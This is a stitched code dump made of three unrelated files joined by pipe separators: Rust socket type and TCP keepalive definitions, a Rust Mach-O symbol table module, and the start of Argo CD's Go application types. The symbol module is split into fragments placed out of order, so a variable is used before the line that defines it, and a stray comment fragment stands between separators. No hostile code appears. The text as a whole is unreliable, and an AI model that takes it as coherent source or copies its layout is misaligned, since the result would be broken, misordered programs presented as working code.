/// Type corresponding to `SOCK_SEQPACKET`.
#[cfg(all(feature = "all", not(target_os = "espidf")))]
#[cfg_attr(docsrs, doc(cfg(all(feature = "all", not(target_os = "espidf")))))]
pub const SEQPACKET: Type = Type(sys::SOCK_SEQPACKET);
/// Type corresponding to `SOCK_RAW`.
#[cfg(all(feature = "all", not(any(target_os = "redox", target_os = "espidf"))))]
#[cfg_attr(
docsrs,
doc(cfg(all(feature = "all", not(any(target_os = "redox", target_os = "espidf")))))
)]
pub const RAW: Type = Type(sys::SOCK_RAW);
}
impl From<c_int> for Type {
fn from(t: c_int) -> Type {
Type(t)
}
}
impl From<Type> for c_int {
fn from(t: Type) -> c_int {
t.0
}
}
/// Protocol specification used for creating sockets via `Socket::new`.
///
/// This is a newtype wrapper around an integer which provides a nicer API in
/// addition to an injection point for documentation.
///
/// This type is freely interconvertible with C's `int` type, however, if a raw
/// value needs to be provided.
#[derive(Copy, Clone, Eq, PartialEq)]
pub struct Protocol(c_int);
impl Protocol {
/// Protocol corresponding to `ICMPv4`.
pub const ICMPV4: Protocol = Protocol(sys::IPPROTO_ICMP);
/// Protocol corresponding to `ICMPv6`.
pub const ICMPV6: Protocol = Protocol(sys::IPPROTO_ICMPV6);
/// Protocol corresponding to `TCP`.
pub const TCP: Protocol = Protocol(sys::IPPROTO_TCP);
/// Protocol corresponding to `UDP`.
pub const UDP: Protocol = Protocol(sys::IPPROTO_UDP);
}
impl From<c_int> for Protocol {
fn from(p: c_int) -> Protocol {
Protocol(p)
}
}
impl From<Protocol> for c_int {
fn from(p: Protocol) -> c_int {
p.0
}
}
/// Flags for incoming messages.
///
/// Flags provide additional information about incoming messages.
#[cfg(not(target_os = "redox"))]
#[cfg_attr(docsrs, doc(cfg(not(target_os = "redox"))))]
#[derive(Copy, Clone, Eq, PartialEq)]
pub struct RecvFlags(c_int);
#[cfg(not(target_os = "redox"))]
impl RecvFlags {
/// Check if the message contains a truncated datagram.
///
/// This flag is only used for datagram-based sockets,
/// not for stream sockets.
///
/// On Unix this corresponds to the `MSG_TRUNC` flag.
/// On Windows this corresponds to the `WSAEMSGSIZE` error code.
pub const fn is_truncated(self) -> bool {
self.0 & sys::MSG_TRUNC != 0
}
}
/// A version of [`IoSliceMut`] that allows the buffer to be uninitialised.
///
/// [`IoSliceMut`]: std::io::IoSliceMut
#[repr(transparent)]
pub struct MaybeUninitSlice<'a>(sys::MaybeUninitSlice<'a>);
unsafe impl<'a> Send for MaybeUninitSlice<'a> {}
unsafe impl<'a> Sync for MaybeUninitSlice<'a> {}
impl<'a> fmt::Debug for MaybeUninitSlice<'a> {
fn fmt(&self, fmt: &mut fmt::Formatter<'_>) -> fmt::Result {
fmt::Debug::fmt(self.0.as_slice(), fmt)
}
}
impl<'a> MaybeUninitSlice<'a> {
/// Creates a new `MaybeUninitSlice` wrapping a byte slice.
///
/// # Panics
///
/// Panics on Windows if the slice is larger than 4GB.
pub fn new(buf: &'a mut [MaybeUninit<u8>]) -> MaybeUninitSlice<'a> {
MaybeUninitSlice(sys::MaybeUninitSlice::new(buf))
}
}
impl<'a> Deref for MaybeUninitSlice<'a> {
type Target = [MaybeUninit<u8>];
fn deref(&self) -> &[MaybeUninit<u8>] {
self.0.as_slice()
}
}
impl<'a> DerefMut for MaybeUninitSlice<'a> {
fn deref_mut(&mut self) -> &mut [MaybeUninit<u8>] {
self.0.as_mut_slice()
}
}
/// Configures a socket's TCP keepalive parameters.
///
/// See [`Socket::set_tcp_keepalive`].
#[derive(Debug, Clone)]
pub struct TcpKeepalive {
time: Option<Duration>,
#[cfg_attr(target_os = "redox", allow(dead_code))]
interval: Option<Duration>,
#[cfg_attr(target_os = "redox", allow(dead_code))]
retries: Option<u32>,
}
impl TcpKeepalive {
/// Returns a new, empty set of TCP keepalive parameters.
pub const fn new() -> TcpKeepalive {
TcpKeepalive {
time: None,
interval: None,
retries: None,
}
}
/// Set the amount of time after which TCP keepalive probes will be sent on
/// idle connections.
///
/// This will set `TCP_KEEPALIVE` on macOS and iOS, and
/// `TCP_KEEPIDLE` on all other Unix operating systems, except
/// OpenBSD and Haiku which don't support any way to set this
/// option. On Windows, this sets the value of the `tcp_keepalive`
/// struct's `keepalivetime` field.
///
/// Some platforms specify this value in seconds, so sub-second
/// specifications may be omitted.
pub const fn with_time(self, time: Duration) -> Self {
Self {
time: Some(time),
..self
}
}
/// Set the value of the `TCP_KEEPINTVL` option. On Windows, this sets the
/// value of the `tcp_keepalive` struct's `keepaliveinterval` field.
///
/// Sets the time interval between TCP keepalive probes.
///
/// Some platforms specify this value in seconds, so sub-second
/// specifications may be omitted.
#[cfg(all(
feature = "all",
any(
target_os = "dragonfly",
target_os = "freebsd",
target_os = "fuchsia",
target_os = "linux",
target_os = "netbsd",
target_vendor = "apple",
windows,
)
))]
#[cfg_attr(
docsrs,
doc(cfg(all(
feature = "all",
any(
target_os = "freebsd",
target_os = "fuchsia",
target_os = "linux",
target_os = "netbsd",
target_vendor = "apple",
windows,
)
)))
)]
pub const fn with_interval(self, interval: Duration) -> Self {
Self {
interval: Some(interval),
..self
}
}
/// Set the value of the `TCP_KEEPCNT` option.
///
/// Set the maximum number of TCP keepalive probes that will be sent before
/// dropping a connection, if TCP keepalive is enabled on this socket.
#[cfg(all(
feature = "all",
any(
doc,
target_os = "dragonfly",
target_os = "freebsd",
target_os = "fuchsia",
target_os = "linux",
target_os = "netbsd",
target_vendor = "apple",
)
))]
#[cfg_attr(
docsrs,
doc(cfg(all(
feature = "all",
any(
target_os = "freebsd",
target_os = "fuchsia",
target_os = "linux",
target_os = "netbsd",
target_vendor = "apple",
)
)))
)]
pub const fn with_retries(self, retries: u32) -> Self {
Self {
retries: Some(retries),
..self
}
}
} | // Need to specific the libc crate because Windows doesn't use |
symbols.rs | use std::borrow::Cow;
use std::collections::{BTreeMap, HashSet};
use std::iter::{IntoIterator, Peekable};
use std::slice;
use failure::ResultExt;
use goblin::mach;
use regex::Regex;
use symbolic_common::types::Name;
use object::{Object, ObjectError, ObjectErrorKind, ObjectTarget};
lazy_static! {
static ref HIDDEN_SYMBOL_RE: Regex = Regex::new("__?hidden#\\d+_").unwrap();
}
/// A single symbol in a `SymbolTable`.
#[derive(Debug)]
pub struct Symbol<'data> {
name: Cow<'data, str>,
addr: u64,
len: Option<u64>,
}
impl<'data> Symbol<'data> {
/// Binary string value of the symbol.
pub fn name(&self) -> &Cow<'data, str> {
&self.name
}
/// Address of this symbol.
pub fn addr(&self) -> u64 {
self.addr
}
/// Presumed length of the symbol.
pub fn len(&self) -> Option<u64> {
self.len
}
/// Indicates if this function spans instructions.
pub fn is_empty(&self) -> bool {
self.len().map_or(false, |l| l == 0)
}
/// Returns the string representation of this symbol.
pub fn as_str(&self) -> &str {
self.name().as_ref()
}
}
impl<'data> Into<Name<'data>> for Symbol<'data> {
fn into(self) -> Name<'data> {
Name::new(self.name)
}
}
impl<'data> Into<Cow<'data, str>> for Symbol<'data> {
fn into(self) -> Cow<'data, str> {
self.name
}
}
impl<'data> Into<String> for Symbol<'data> {
fn into(self) -> String {
self.name.into()
}
}
/// Internal wrapper around certain symbol table implementations.
#[derive(Clone, Debug)]
enum SymbolsInternal<'data> {
MachO(&'data mach::symbols::Symbols<'data>),
}
impl<'data> SymbolsInternal<'data> {
/// Returns the symbol at the given index.
///
/// To compute the presumed length of a symbol, pass the index of the
/// logically next symbol (i.e. the one with the next greater address).
pub fn get(
&self,
index: usize,
next: Option<usize>,
) -> Result<Option<Symbol<'data>>, ObjectError> {
Ok(Some(match *self {
SymbolsInternal::MachO(symbols) => {
let (name, nlist) = symbols.get(index).context(ObjectErrorKind::BadObject)?;
let stripped = if name.starts_with('_') {
&name[1..]
} else {
name
}; | let len = next
.and_then(|index| symbols.get(index).ok())
.map(|(_, nlist)| nlist.n_value - addr);
Symbol {
name: Cow::Borrowed(stripped),
addr,
len,
}
}
}))
}
}
/// Internal type used to map addresses to symbol indices.
///
/// - `mapping.0`: The address of a symbol
/// - `mapping.1`: The index of a symbol in the symbol list
type IndexMapping = (u64, usize);
/// An iterator over `Symbol`s in a symbol table.
///
/// It can be obtained via `SymbolTable::symbols`. This is primarily intended for
/// consuming all symbols in an object file. To lookup single symbols, use
/// `Symbols::lookup` instead.
pub struct SymbolIterator<'data, 'sym>
where
'data: 'sym,
{
symbols: &'sym Symbols<'data>,
iter: Peekable<slice::Iter<'sym, IndexMapping>>,
}
impl<'data, 'sym> Iterator for SymbolIterator<'data, 'sym> {
type Item = Result<Symbol<'data>, ObjectError>;
fn next(&mut self) -> Option<Self::Item> {
let index = match self.iter.next() {
Some(map) => map.1,
None => return None,
};
let next = self.iter.peek().map(|mapping| mapping.1);
match self.symbols.internal.get(index, next) {
Ok(Some(symbol)) => Some(Ok(symbol)),
Ok(None) => None,
Err(err) => Some(Err(err)),
}
}
fn size_hint(&self) -> (usize, Option<usize>) {
self.iter.size_hint()
}
fn count(self) -> usize {
self.iter.count()
}
}
/// Provides access to `Symbol`s of an `Object`.
///
/// It allows to either lookup single symbols with `Symbols::lookup` or iterate
/// them using `Symbols::into_iter`. Use `SymbolTable::lookup` on an `Object` to
/// retrieve the symbols.
pub struct Symbols<'data> {
internal: SymbolsInternal<'data>,
mappings: Vec<IndexMapping>,
}
impl<'data> Symbols<'data> {
/// Creates a `Symbols` wrapper for MachO.
fn from_macho(macho: &'data mach::MachO) -> Result<Option<Symbols<'data>>, ObjectError> {
let macho_symbols = match macho.symbols {
Some(ref symbols) => symbols,
None => return Ok(None),
};
let mut sections = HashSet::new();
let mut section_index = 0;
// Cache section indices that we are interested in
for segment in &macho.segments {
for section_rv in segment {
let (section, _) = section_rv.context(ObjectErrorKind::BadObject)?;
let name = section.name().context(ObjectErrorKind::BadObject)?;
if name == "__stubs" || name == "__text" {
sections.insert(section_index);
}
section_index += 1;
}
}
// Build an ordered map of only symbols we are interested in
let mut symbol_map = BTreeMap::new();
for (symbol_index, symbol_result) in macho.symbols().enumerate() {
let (_, nlist) = symbol_result.context(ObjectErrorKind::BadObject)?;
let in_valid_section = nlist.get_type() == mach::symbols::N_SECT
&& nlist.n_sect != (mach::symbols::NO_SECT as usize)
&& sections.contains(&(nlist.n_sect - 1));
if in_valid_section {
symbol_map.insert(nlist.n_value, symbol_index);
}
}
Ok(Some(Symbols {
internal: SymbolsInternal::MachO(macho_symbols),
mappings: symbol_map.into_iter().collect(),
}))
}
/// Searches for a single `Symbol` inside the symbol table.
pub fn lookup(&self, addr: u64) -> Result<Option<Symbol<'data>>, ObjectError> {
let found = match self.mappings.binary_search_by_key(&addr, |&x| x.0) {
Ok(idx) => idx,
Err(0) => return Ok(None),
Err(next_idx) => next_idx - 1,
};
let index = self.mappings[found].1;
let next = self.mappings.get(found + 1).map(|mapping| mapping.1);
self.internal.get(index, next)
}
/// Checks whether this binary contains hidden symbols.
///
/// This is an indication that BCSymbolMaps are needed to symbolicate
/// symbols correctly.
pub fn requires_symbolmap(&self) -> bool {
// Hidden symbols can only ever occur in Apple's dSYM
match self.internal {
SymbolsInternal::MachO(..) => (),
};
for symbol in self.iter() {
if symbol
.map(|s| HIDDEN_SYMBOL_RE.is_match(s.as_str()))
.unwrap_or(false)
{
return true;
}
}
false
}
pub fn iter<'sym>(&'sym self) -> SymbolIterator<'data, 'sym> {
SymbolIterator {
symbols: self,
iter: self.mappings.iter().peekable(),
}
}
}
/// Gives access to the symbol table of an `Object` file.
pub trait SymbolTable {
/// Returns the symbols of this `Object`.
///
/// If the symbol table has been stripped from the object, `None` is returned. In case a symbol
/// table is present, but the trait has not been implemented for the object kind, an error is
/// returned.
fn symbols(&self) -> Result<Option<Symbols>, ObjectError>;
}
impl<'data> SymbolTable for Object<'data> {
fn symbols(&self) -> Result<Option<Symbols>, ObjectError> {
match self.target {
ObjectTarget::MachOSingle(macho) => Symbols::from_macho(macho),
ObjectTarget::MachOFat(_, ref macho) => Symbols::from_macho(macho),
_ => Err(ObjectErrorKind::UnsupportedSymbolTable.into()),
}
}
} |
// The length is only calculated if `next` is specified and does
// not result in an error. Otherwise, errors here are swallowed.
let addr = nlist.n_value; |
types.go | package v1alpha1
import (
"encoding/json"
"fmt"
math "math"
"net"
"net/http"
"net/url"
"os"
"path/filepath"
"reflect"
"regexp"
"sort"
"strconv"
"strings"
"time"
"github.com/argoproj/gitops-engine/pkg/health"
synccommon "github.com/argoproj/gitops-engine/pkg/sync/common"
"github.com/ghodss/yaml"
"github.com/google/go-cmp/cmp"
"github.com/robfig/cron"
log "github.com/sirupsen/logrus"
"google.golang.org/grpc/codes"
"google.golang.org/grpc/status"
v1 "k8s.io/api/core/v1"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/apimachinery/pkg/apis/meta/v1/unstructured"
"k8s.io/apimachinery/pkg/runtime/schema"
utilnet "k8s.io/apimachinery/pkg/util/net"
"k8s.io/apimachinery/pkg/watch"
"k8s.io/client-go/rest"
"k8s.io/client-go/tools/clientcmd"
"k8s.io/client-go/tools/clientcmd/api"
"github.com/argoproj/argo-cd/common"
"github.com/argoproj/argo-cd/util/cert"
"github.com/argoproj/argo-cd/util/git"
"github.com/argoproj/argo-cd/util/glob"
"github.com/argoproj/argo-cd/util/helm"
)
// Application is a definition of Application resource.
// +genclient
// +genclient:noStatus
// +k8s:deepcopy-gen:interfaces=k8s.io/apimachinery/pkg/runtime.Object
// +kubebuilder:resource:path=applications,shortName=app;apps
// +kubebuilder:printcolumn:name="Sync Status",type=string,JSONPath=`.status.sync.status`
// +kubebuilder:printcolumn:name="Health Status",type=string,JSONPath=`.status.health.status`
// +kubebuilder:printcolumn:name="Revision",type=string,JSONPath=`.status.sync.revision`,priority=10
type Application struct {
metav1.TypeMeta `json:",inline"`
metav1.ObjectMeta `json:"metadata" protobuf:"bytes,1,opt,name=metadata"`
Spec ApplicationSpec `json:"spec" protobuf:"bytes,2,opt,name=spec"`
Status ApplicationStatus `json:"status,omitempty" protobuf:"bytes,3,opt,name=status"`
Operation *Operation `json:"operation,omitempty" protobuf:"bytes,4,opt,name=operation"`
}
// ApplicationSpec represents desired application state. Contains link to repository with application definition and additional parameters link definition revision.
type ApplicationSpec struct {
// Source is a reference to the location ksonnet application definition
Source ApplicationSource `json:"source" protobuf:"bytes,1,opt,name=source"`
// Destination overrides the kubernetes server and namespace defined in the environment ksonnet app.yaml
Destination ApplicationDestination `json:"destination" protobuf:"bytes,2,name=destination"`
// Project is a application project name. Empty name means that application belongs to 'default' project.
Project string `json:"project" protobuf:"bytes,3,name=project"`
// SyncPolicy controls when a sync will be performed
SyncPolicy *SyncPolicy `json:"syncPolicy,omitempty" protobuf:"bytes,4,name=syncPolicy"`
// IgnoreDifferences controls resources fields which should be ignored during comparison
IgnoreDifferences []ResourceIgnoreDifferences `json:"ignoreDifferences,omitempty" protobuf:"bytes,5,name=ignoreDifferences"`
// Infos contains a list of useful information (URLs, email addresses, and plain text) that relates to the application
Info []Info `json:"info,omitempty" protobuf:"bytes,6,name=info"`
// This limits this number of items kept in the apps revision history.
// This should only be changed in exceptional circumstances.
// Setting to zero will store no history. This will reduce storage used.
// Increasing will increase the space used to store the history, so we do not recommend increasing it.
// Default is 10.
RevisionHistoryLimit *int64 `json:"revisionHistoryLimit,omitempty" protobuf:"bytes,7,name=revisionHistoryLimit"`
}
// ResourceIgnoreDifferences contains resource filter and list of json paths which should be ignored during comparison with live state.
type ResourceIgnoreDifferences struct {
Group string `json:"group,omitempty" protobuf:"bytes,1,opt,name=group"`
Kind string `json:"kind" protobuf:"bytes,2,opt,name=kind"`
Name string `json:"name,omitempty" protobuf:"bytes,3,opt,name=name"`
Namespace string `json:"namespace,omitempty" protobuf:"bytes,4,opt,name=namespace"`
JSONPointers []string `json:"jsonPointers" protobuf:"bytes,5,opt,name=jsonPointers"`
}
type EnvEntry struct {
// the name, usually uppercase
Name string `json:"name" protobuf:"bytes,1,opt,name=name"`
// the value
Value string `json:"value" protobuf:"bytes,2,opt,name=value"`
}
func (a *EnvEntry) IsZero() bool {
return a == nil || a.Name == "" && a.Value == ""
}
func NewEnvEntry(text string) (*EnvEntry, error) {
parts := strings.SplitN(text, "=", 2)
if len(parts) != 2 {
return nil, fmt.Errorf("Expected env entry of the form: param=value. Received: %s", text)
}
return &EnvEntry{
Name: parts[0],
Value: parts[1],
}, nil
}
type Env []*EnvEntry
func (e Env) IsZero() bool {
return len(e) == 0
}
func (e Env) Environ() []string {
var environ []string
for _, item := range e {
if !item.IsZero() {
environ = append(environ, fmt.Sprintf("%s=%s", item.Name, item.Value))
}
}
return environ
}
// does an operation similar to `envsubst` tool,
func (e Env) Envsubst(s string) string {
valByEnv := map[string]string{}
for _, item := range e {
valByEnv[item.Name] = item.Value
}
return os.Expand(s, func(s string) string {
return valByEnv[s]
})
}
// ApplicationSource contains information about github repository, path within repository and target application environment.
type ApplicationSource struct {
// RepoURL is the repository URL of the application manifests
RepoURL string `json:"repoURL" protobuf:"bytes,1,opt,name=repoURL"`
// Path is a directory path within the Git repository
Path string `json:"path,omitempty" protobuf:"bytes,2,opt,name=path"`
// TargetRevision defines the commit, tag, or branch in which to sync the application to.
// If omitted, will sync to HEAD
TargetRevision string `json:"targetRevision,omitempty" protobuf:"bytes,4,opt,name=targetRevision"`
// Helm holds helm specific options
Helm *ApplicationSourceHelm `json:"helm,omitempty" protobuf:"bytes,7,opt,name=helm"`
// Kustomize holds kustomize specific options
Kustomize *ApplicationSourceKustomize `json:"kustomize,omitempty" protobuf:"bytes,8,opt,name=kustomize"`
// Ksonnet holds ksonnet specific options
Ksonnet *ApplicationSourceKsonnet `json:"ksonnet,omitempty" protobuf:"bytes,9,opt,name=ksonnet"`
// Directory holds path/directory specific options
Directory *ApplicationSourceDirectory `json:"directory,omitempty" protobuf:"bytes,10,opt,name=directory"`
// ConfigManagementPlugin holds config management plugin specific options
Plugin *ApplicationSourcePlugin `json:"plugin,omitempty" protobuf:"bytes,11,opt,name=plugin"`
// Chart is a Helm chart name
Chart string `json:"chart,omitempty" protobuf:"bytes,12,opt,name=chart"`
}
// AllowsConcurrentProcessing returns true if given application source can be processed concurrently
func (a *ApplicationSource) AllowsConcurrentProcessing() bool {
switch {
// Kustomize with parameters requires changing kustomization.yaml file
case a.Kustomize != nil:
return a.Kustomize.AllowsConcurrentProcessing()
// Kustomize with parameters requires changing params.libsonnet file
case a.Ksonnet != nil:
return a.Ksonnet.AllowsConcurrentProcessing()
}
return true
}
func (a *ApplicationSource) IsHelm() bool {
return a.Chart != ""
}
func (a *ApplicationSource) IsHelmOci() bool {
if a.Chart == "" {
return false
}
return helm.IsHelmOciChart(a.Chart)
}
func (a *ApplicationSource) IsZero() bool {
return a == nil ||
a.RepoURL == "" &&
a.Path == "" &&
a.TargetRevision == "" &&
a.Helm.IsZero() &&
a.Kustomize.IsZero() &&
a.Ksonnet.IsZero() &&
a.Directory.IsZero() &&
a.Plugin.IsZero()
}
type ApplicationSourceType string
const (
ApplicationSourceTypeHelm ApplicationSourceType = "Helm"
ApplicationSourceTypeKustomize ApplicationSourceType = "Kustomize"
ApplicationSourceTypeKsonnet ApplicationSourceType = "Ksonnet"
ApplicationSourceTypeDirectory ApplicationSourceType = "Directory"
ApplicationSourceTypePlugin ApplicationSourceType = "Plugin"
)
type RefreshType string
const (
RefreshTypeNormal RefreshType = "normal"
RefreshTypeHard RefreshType = "hard"
)
// ApplicationSourceHelm holds helm specific options
type ApplicationSourceHelm struct {
// ValuesFiles is a list of Helm value files to use when generating a template
ValueFiles []string `json:"valueFiles,omitempty" protobuf:"bytes,1,opt,name=valueFiles"`
// Parameters are parameters to the helm template
Parameters []HelmParameter `json:"parameters,omitempty" protobuf:"bytes,2,opt,name=parameters"`
// The Helm release name. If omitted it will use the application name
ReleaseName string `json:"releaseName,omitempty" protobuf:"bytes,3,opt,name=releaseName"`
// Values is Helm values, typically defined as a block
Values string `json:"values,omitempty" protobuf:"bytes,4,opt,name=values"`
// FileParameters are file parameters to the helm template
FileParameters []HelmFileParameter `json:"fileParameters,omitempty" protobuf:"bytes,5,opt,name=fileParameters"`
// Version is the Helm version to use for templating with
Version string `json:"version,omitempty" protobuf:"bytes,6,opt,name=version"`
}
// HelmParameter is a parameter to a helm template
type HelmParameter struct {
// Name is the name of the helm parameter
Name string `json:"name,omitempty" protobuf:"bytes,1,opt,name=name"`
// Value is the value for the helm parameter
Value string `json:"value,omitempty" protobuf:"bytes,2,opt,name=value"`
// ForceString determines whether to tell Helm to interpret booleans and numbers as strings
ForceString bool `json:"forceString,omitempty" protobuf:"bytes,3,opt,name=forceString"`
}
// HelmFileParameter is a file parameter to a helm template
type HelmFileParameter struct {
// Name is the name of the helm parameter
Name string `json:"name,omitempty" protobuf:"bytes,1,opt,name=name"`
// Path is the path value for the helm parameter
Path string `json:"path,omitempty" protobuf:"bytes,2,opt,name=path"`
}
var helmParameterRx = regexp.MustCompile(`([^\\]),`)
func NewHelmParameter(text string, forceString bool) (*HelmParameter, error) {
parts := strings.SplitN(text, "=", 2)
if len(parts) != 2 {
return nil, fmt.Errorf("Expected helm parameter of the form: param=value. Received: %s", text)
}
return &HelmParameter{
Name: parts[0],
Value: helmParameterRx.ReplaceAllString(parts[1], `$1\,`),
ForceString: forceString,
}, nil
}
func NewHelmFileParameter(text string) (*HelmFileParameter, error) {
parts := strings.SplitN(text, "=", 2)
if len(parts) != 2 {
return nil, fmt.Errorf("Expected helm file parameter of the form: param=path. Received: %s", text)
}
return &HelmFileParameter{
Name: parts[0],
Path: helmParameterRx.ReplaceAllString(parts[1], `$1\,`),
}, nil
}
func (in *ApplicationSourceHelm) AddParameter(p HelmParameter) {
found := false
for i, cp := range in.Parameters {
if cp.Name == p.Name {
found = true
in.Parameters[i] = p
break
}
}
if !found {
in.Parameters = append(in.Parameters, p)
}
}
func (in *ApplicationSourceHelm) AddFileParameter(p HelmFileParameter) {
found := false
for i, cp := range in.FileParameters {
if cp.Name == p.Name {
found = true
in.FileParameters[i] = p
break
}
}
if !found {
in.FileParameters = append(in.FileParameters, p)
}
}
func (h *ApplicationSourceHelm) IsZero() bool {
return h == nil || (h.Version == "") && (h.ReleaseName == "") && len(h.ValueFiles) == 0 && len(h.Parameters) == 0 && len(h.FileParameters) == 0 && h.Values == ""
}
type KustomizeImage string
func (i KustomizeImage) delim() string {
for _, d := range []string{"=", ":", "@"} {
if strings.Contains(string(i), d) {
return d
}
}
return ":"
}
// if the image name matches (i.e. up to the first delimiter)
func (i KustomizeImage) Match(j KustomizeImage) bool {
delim := j.delim()
if !strings.Contains(string(j), delim) {
return false
}
return strings.HasPrefix(string(i), strings.Split(string(j), delim)[0])
}
type KustomizeImages []KustomizeImage
// find the image or -1
func (images KustomizeImages) Find(image KustomizeImage) int {
for i, a := range images {
if a.Match(image) {
return i
}
}
return -1
}
// ApplicationSourceKustomize holds kustomize specific options
type ApplicationSourceKustomize struct {
// NamePrefix is a prefix appended to resources for kustomize apps
NamePrefix string `json:"namePrefix,omitempty" protobuf:"bytes,1,opt,name=namePrefix"`
// NameSuffix is a suffix appended to resources for kustomize apps
NameSuffix string `json:"nameSuffix,omitempty" protobuf:"bytes,2,opt,name=nameSuffix"`
// Images are kustomize image overrides
Images KustomizeImages `json:"images,omitempty" protobuf:"bytes,3,opt,name=images"`
// CommonLabels adds additional kustomize commonLabels
CommonLabels map[string]string `json:"commonLabels,omitempty" protobuf:"bytes,4,opt,name=commonLabels"`
// Version contains optional Kustomize version
Version string `json:"version,omitempty" protobuf:"bytes,5,opt,name=version"`
// CommonAnnotations adds additional kustomize commonAnnotations
CommonAnnotations map[string]string `json:"commonAnnotations,omitempty" protobuf:"bytes,6,opt,name=commonAnnotations"`
}
func (k *ApplicationSourceKustomize) AllowsConcurrentProcessing() bool {
return len(k.Images) == 0 &&
len(k.CommonLabels) == 0 &&
k.NamePrefix == "" &&
k.NameSuffix == ""
}
func (k *ApplicationSourceKustomize) IsZero() bool {
return k == nil ||
k.NamePrefix == "" &&
k.NameSuffix == "" &&
k.Version == "" &&
len(k.Images) == 0 &&
len(k.CommonLabels) == 0 &&
len(k.CommonAnnotations) == 0
}
// either updates or adds the images
func (k *ApplicationSourceKustomize) MergeImage(image KustomizeImage) {
i := k.Images.Find(image)
if i >= 0 {
k.Images[i] = image
} else {
k.Images = append(k.Images, image)
}
}
// JsonnetVar is a jsonnet variable
type JsonnetVar struct {
Name string `json:"name" protobuf:"bytes,1,opt,name=name"`
Value string `json:"value" protobuf:"bytes,2,opt,name=value"`
Code bool `json:"code,omitempty" protobuf:"bytes,3,opt,name=code"`
}
func NewJsonnetVar(s string, code bool) JsonnetVar {
parts := strings.SplitN(s, "=", 2)
if len(parts) == 2 {
return JsonnetVar{Name: parts[0], Value: parts[1], Code: code}
} else {
return JsonnetVar{Name: s, Code: code}
}
}
// ApplicationSourceJsonnet holds jsonnet specific options
type ApplicationSourceJsonnet struct {
// ExtVars is a list of Jsonnet External Variables
ExtVars []JsonnetVar `json:"extVars,omitempty" protobuf:"bytes,1,opt,name=extVars"`
// TLAS is a list of Jsonnet Top-level Arguments
TLAs []JsonnetVar `json:"tlas,omitempty" protobuf:"bytes,2,opt,name=tlas"`
// Additional library search dirs
Libs []string `json:"libs,omitempty" protobuf:"bytes,3,opt,name=libs"`
}
func (j *ApplicationSourceJsonnet) IsZero() bool {
return j == nil || len(j.ExtVars) == 0 && len(j.TLAs) == 0 && len(j.Libs) == 0
}
// ApplicationSourceKsonnet holds ksonnet specific options
type ApplicationSourceKsonnet struct {
// Environment is a ksonnet application environment name
Environment string `json:"environment,omitempty" protobuf:"bytes,1,opt,name=environment"`
// Parameters are a list of ksonnet component parameter override values
Parameters []KsonnetParameter `json:"parameters,omitempty" protobuf:"bytes,2,opt,name=parameters"`
}
// KsonnetParameter is a ksonnet component parameter
type KsonnetParameter struct {
Component string `json:"component,omitempty" protobuf:"bytes,1,opt,name=component"`
Name string `json:"name" protobuf:"bytes,2,opt,name=name"`
Value string `json:"value" protobuf:"bytes,3,opt,name=value"`
}
func (k *ApplicationSourceKsonnet) AllowsConcurrentProcessing() bool {
return len(k.Parameters) == 0
}
func (k *ApplicationSourceKsonnet) IsZero() bool {
return k == nil || k.Environment == "" && len(k.Parameters) == 0
}
type ApplicationSourceDirectory struct {
Recurse bool `json:"recurse,omitempty" protobuf:"bytes,1,opt,name=recurse"`
Jsonnet ApplicationSourceJsonnet `json:"jsonnet,omitempty" protobuf:"bytes,2,opt,name=jsonnet"`
Exclude string `json:"exclude,omitempty" protobuf:"bytes,3,opt,name=exclude"`
Include string `json:"include,omitempty" protobuf:"bytes,4,opt,name=include"`
}
func (d *ApplicationSourceDirectory) IsZero() bool {
return d == nil || !d.Recurse && d.Jsonnet.IsZero()
}
// ApplicationSourcePlugin holds config management plugin specific options
type ApplicationSourcePlugin struct {
Name string `json:"name,omitempty" protobuf:"bytes,1,opt,name=name"`
Env `json:"env,omitempty" protobuf:"bytes,2,opt,name=env"`
}
func (c *ApplicationSourcePlugin) IsZero() bool {
return c == nil || c.Name == "" && c.Env.IsZero()
}
func (c *ApplicationSourcePlugin) AddEnvEntry(e *EnvEntry) {
found := false
for i, ce := range c.Env {
if ce.Name == e.Name {
found = true
c.Env[i] = e
break
}
}
if !found {
c.Env = append(c.Env, e)
}
}
// ApplicationDestination contains deployment destination information
type ApplicationDestination struct {
// Server overrides the environment server value in the ksonnet app.yaml
Server string `json:"server,omitempty" protobuf:"bytes,1,opt,name=server"`
// Namespace overrides the environment namespace value in the ksonnet app.yaml
Namespace string `json:"namespace,omitempty" protobuf:"bytes,2,opt,name=namespace"`
// Name of the destination cluster which can be used instead of server (url) field
Name string `json:"name,omitempty" protobuf:"bytes,3,opt,name=name"`
// nolint:govet
isServerInferred bool `json:"-"`
}
// ApplicationStatus contains information about application sync, health status
type ApplicationStatus struct {
Resources []ResourceStatus `json:"resources,omitempty" protobuf:"bytes,1,opt,name=resources"`
Sync SyncStatus `json:"sync,omitempty" protobuf:"bytes,2,opt,name=sync"`
Health HealthStatus `json:"health,omitempty" protobuf:"bytes,3,opt,name=health"`
History RevisionHistories `json:"history,omitempty" protobuf:"bytes,4,opt,name=history"`
Conditions []ApplicationCondition `json:"conditions,omitempty" protobuf:"bytes,5,opt,name=conditions"`
// ReconciledAt indicates when the application state was reconciled using the latest git version
ReconciledAt *metav1.Time `json:"reconciledAt,omitempty" protobuf:"bytes,6,opt,name=reconciledAt"`
OperationState *OperationState `json:"operationState,omitempty" protobuf:"bytes,7,opt,name=operationState"`
// ObservedAt indicates when the application state was updated without querying latest git state
// Deprecated: controller no longer updates ObservedAt field
ObservedAt *metav1.Time `json:"observedAt,omitempty" protobuf:"bytes,8,opt,name=observedAt"`
SourceType ApplicationSourceType `json:"sourceType,omitempty" protobuf:"bytes,9,opt,name=sourceType"`
Summary ApplicationSummary `json:"summary,omitempty" protobuf:"bytes,10,opt,name=summary"`
}
type JWTTokens struct {
Items []JWTToken `json:"items,omitempty" protobuf:"bytes,1,opt,name=items"`
}
// AppProjectStatus contains information about appproj
type AppProjectStatus struct {
JWTTokensByRole map[string]JWTTokens `json:"jwtTokensByRole,omitempty" protobuf:"bytes,1,opt,name=jwtTokensByRole"`
}
// OperationInitiator holds information about the operation initiator
type OperationInitiator struct {
// Name of a user who started operation.
Username string `json:"username,omitempty" protobuf:"bytes,1,opt,name=username"`
// Automated is set to true if operation was initiated automatically by the application controller.
Automated bool `json:"automated,omitempty" protobuf:"bytes,2,opt,name=automated"`
}
// Operation contains requested operation parameters.
type Operation struct {
Sync *SyncOperation `json:"sync,omitempty" protobuf:"bytes,1,opt,name=sync"`
